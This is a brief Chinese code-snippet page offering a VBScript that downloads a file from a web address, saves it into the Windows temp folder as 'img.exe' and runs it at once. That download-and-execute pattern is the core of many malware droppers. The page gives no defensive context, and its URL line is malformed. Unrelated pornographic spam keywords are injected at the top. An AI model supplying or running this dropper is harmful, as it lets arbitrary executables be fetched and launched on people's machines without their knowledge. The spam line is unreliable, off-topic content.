欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

下載文件到本地運(yùn)行的vbs

 更新時(shí)間:2006年10月09日 00:00:00   作者:  
復(fù)制代碼 代碼如下:

'on error resume next
dl = http://www.dbjr.com.cn/index.htm '這是要下載的文件的路徑
str="Microsoft.XMLHTTP"
Set x = CreateObject(str)
Set x = CreateObject(str)
set S = createobject("adodb.stream")
S.type = 1
x.Open "GET", dl, False
x.Send()
fname1="img.exe"
set F = createobject("Scripting.FileSystemObject")
set tmp = F.GetSpecialFolder(2) '緩存
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
msgbox fname1
S.close
set Q = createobject("Shell.Application")
Q.ShellExecute fname1

相關(guān)文章

最新評(píng)論